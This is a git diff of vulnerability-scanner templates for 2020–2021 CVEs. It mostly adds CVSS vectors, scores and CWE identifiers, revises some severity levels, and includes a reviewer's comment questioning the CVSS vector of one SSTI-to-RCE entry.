@@ -11,6 +11,11 @@ info: - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-9490 + cwe-id: CWE-444 requests: - method: GET diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index d8143b9e67..062a835761 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index c9ef094170..fac0befccd 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -6,6 +6,16 @@ info: severity: high description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. tags: cve,cve2020,ssti + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9757 + cwe-id: CWE-74 + reference: + - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md + - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt + - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b + - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f requests: - method: GET 
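Review bot: in cves/2020/CVE-2020-9757.yaml the added cvss-metrics ends in C:H/I:N/A:N (7.50), which does not fit the description in the same hunk, "Server-Side Template Injection that leads to RCE"; a code-execution outcome would normally carry integrity and availability impact as well. Please confirm the vector against the CVE record, and change cvss-score and severity together if it moves. The new reference list is also placed after classification here, while in most other hunks of this patch classification is the last key before requests; moving reference above it would keep the info block layout uniform.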
diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 35aef60dbd..0074e7885d 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -15,6 +15,11 @@ info: - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-1497 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 9c9c57c372..f0e0214349 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,lfi,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20090 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 6ac0d4f526..650be7cd88 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20091 info: name: Buffalo WSR-2533DHPL2 - Configuration File Injection author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: 
@@ -11,6 +11,10 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-20091 requests: - raw: diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index a419448255..72246e7705 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20092 info: name: Buffalo WSR-2533DHPL2 - Improper Access Control author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20092 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index 981a841397..1d17cd2a0e 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 tags: cve,cve2021,tcexam,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20114 + cwe-id: CWE-200 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index cbfbd7cb86..182a3934d7 100644 --- a/cves/2021/CVE-2021-21234.yaml 
+++ b/cves/2021/CVE-2021-21234.yaml @@ -10,6 +10,11 @@ info: - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 tags: cve,cve2021,springboot,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.70 + cve-id: CVE-2021-21234 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml index 83f46804d2..53b683b142 100644 --- a/cves/2021/CVE-2021-21307.yaml +++ b/cves/2021/CVE-2021-21307.yaml @@ -10,6 +10,11 @@ info: - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 tags: cve,cve2021,rce,lucee,adobe + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21307 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index 13d9c5e2c7..a2289106db 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - https://security.netapp.com/advisory/ntap-20210312-0007/ tags: nodejs,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-21315 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml index adec07c32f..5d83282a56 100644 --- a/cves/2021/CVE-2021-21389.yaml +++ b/cves/2021/CVE-2021-21389.yaml @@ -3,7 +3,7 @@ id: CVE-2021-21389 info: name: BuddyPress REST API Privilege Escalation to RCE author: lotusdll - severity: critical + severity: high description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE reference: - https://github.com/HoangKien1020/CVE-2021-21389 
@@ -11,6 +11,11 @@ info: - https://codex.buddypress.org/releases/version-7-2-1/ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3 tags: cve,cve2021,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-21389 + cwe-id: CWE-863 requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index 816303d5e5..c3c29e4665 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -3,13 +3,18 @@ id: CVE-2021-21402 info: name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read author: dwisiswant0 - severity: high + severity: medium description: | Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ tags: cve,cve2021,jellyfin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-21402 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml index 5d60f46f48..befe4c3526 100644 --- a/cves/2021/CVE-2021-21479.yaml +++ b/cves/2021/CVE-2021-21479.yaml @@ -9,6 +9,11 @@ info: In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.10 + cve-id: CVE-2021-21479 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml index 338eccbd88..7168dc705a 100644 --- a/cves/2021/CVE-2021-21801.yaml +++ b/cves/2021/CVE-2021-21801.yaml 
@@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml index a3eeb5f61e..a17edd857e 100644 --- a/cves/2021/CVE-2021-21802.yaml +++ b/cves/2021/CVE-2021-21802.yaml @@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml index 93a8fcf35e..1068d20cde 100644 --- a/cves/2021/CVE-2021-21803.yaml +++ b/cves/2021/CVE-2021-21803.yaml 
@@ -7,6 +7,11 @@ info: description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 tags: cve,cve2021,r-seenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21803 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index e8df776430..de4ad69f3f 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -7,6 +7,11 @@ info: severity: medium reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 tags: cve,cve2021,dlink,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-21816 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 4e9eb24eec..d69c8904d3 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -7,6 +7,11 @@ info: reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21972 + cwe-id: CWE-269 requests: - method: GET diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml index e7337d9775..043597989c 100644 --- a/cves/2021/CVE-2021-21975.yaml +++ b/cves/2021/CVE-2021-21975.yaml 
@@ -3,10 +3,15 @@ id: CVE-2021-21975 info: name: vRealize Operations Manager API SSRF (VMWare Operations) author: luci - severity: critical + severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. tags: cve,cve2021,ssrf,vmware,vrealize reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-21975 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml index 396c5b2fbc..5dc7d8641b 100644 --- a/cves/2021/CVE-2021-21978.yaml +++ b/cves/2021/CVE-2021-21978.yaml @@ -11,6 +11,11 @@ info: An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. tags: cve,cve2021,vmware,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21978 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index ad807159dc..3c61e44f64 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -11,6 +11,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC tags: cve,cve2021,rce,vsphere + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-21985 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 53c6058203..83ca4f6d61 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml 
@@ -11,6 +11,11 @@ info: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 tags: cve,cve2021,fortiweb,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22122 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml index e018f535d1..3a38bddc00 100644 --- a/cves/2021/CVE-2021-22145.yaml +++ b/cves/2021/CVE-2021-22145.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html tags: cve,cve2021,elascticsearch + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-22145 + cwe-id: CWE-209 requests: - method: POST diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index b4e407b056..f1fcc89ba3 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -3,13 +3,18 @@ id: CVE-2021-22214 info: author: Suman_Kar name: Unauthenticated Gitlab SSRF - CI Lint API - severity: medium + severity: high description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://docs.gitlab.com/ee/api/lint.html tags: cve,cve2021,gitlab,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-22214 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index ba23365c25..f0ccf1f6b7 100644 
--- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -3,10 +3,15 @@ id: CVE-2021-22873 info: name: Revive Adserver < 5.1.0 Open Redirect author: pudsec - severity: low + severity: medium description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873 tags: cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-22873 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index 508e2fda49..230b015a29 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -8,6 +8,10 @@ info: reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22986 requests: - raw: diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml index 67b62f066e..da0426c806 100644 --- a/cves/2021/CVE-2021-23241.yaml +++ b/cves/2021/CVE-2021-23241.yaml @@ -9,6 +9,11 @@ info: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 tags: cve,cve2021,iot,lfi,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-23241 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml index c950e67161..61d3d453df 100644 --- a/cves/2021/CVE-2021-24146.yaml +++ b/cves/2021/CVE-2021-24146.yaml 
@@ -7,6 +7,11 @@ info: severity: high reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc tags: wordpress,wp-plugin,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24146 + cwe-id: CWE-284 requests: - method: GET diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml index 54bede3572..1d03f5739e 100644 --- a/cves/2021/CVE-2021-24176.yaml +++ b/cves/2021/CVE-2021-24176.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index faca3d5383..50b0897459 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -9,8 +9,13 @@ info: ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - severity: low + severity: medium tags: wordpress,cve,cve2021,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml index 6da6293c88..1178e0035a 100644 --- a/cves/2021/CVE-2021-24235.yaml +++ b/cves/2021/CVE-2021-24235.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24235 + cwe-id: CWE-79 + description: "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue." requests: - method: GET diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml index 365eb7c2d9..c9842dc7c4 100644 --- a/cves/2021/CVE-2021-24237.yaml +++ b/cves/2021/CVE-2021-24237.yaml @@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24237 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml index 7fb471bc6f..d620d2d396 100644 --- a/cves/2021/CVE-2021-24285.yaml +++ b/cves/2021/CVE-2021-24285.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-24285 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2021/CVE-2021-24288.yaml b/cves/2021/CVE-2021-24288.yaml index d5b21f2ecd..5b0b13cded 100644 --- a/cves/2021/CVE-2021-24288.yaml +++ b/cves/2021/CVE-2021-24288.yaml 
@@ -7,6 +7,11 @@ info: description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription. reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 tags: wordpress,cve,cve2021,redirect,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24288 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml index 3d7e73cfbc..736f309f8a 100644 --- a/cves/2021/CVE-2021-24291.yaml +++ b/cves/2021/CVE-2021-24291.yaml @@ -7,6 +7,11 @@ info: reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index 40b4fa673f..21462431a1 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -7,6 +7,11 @@ info: description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24298 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml index f4b9b78af4..9d76374f71 100644 --- a/cves/2021/CVE-2021-24316.yaml +++ b/cves/2021/CVE-2021-24316.yaml 
@@ -9,6 +9,11 @@ info: reference: - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 408f23de62..458e6b28e6 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -9,6 +9,11 @@ info: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24320 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index 960dfbe32b..89d2be4bec 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -7,6 +7,11 @@ info: description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 tags: cve,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24335 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml index a20c217e53..498fb61986 100644 --- a/cves/2021/CVE-2021-24340.yaml +++ b/cves/2021/CVE-2021-24340.yaml 
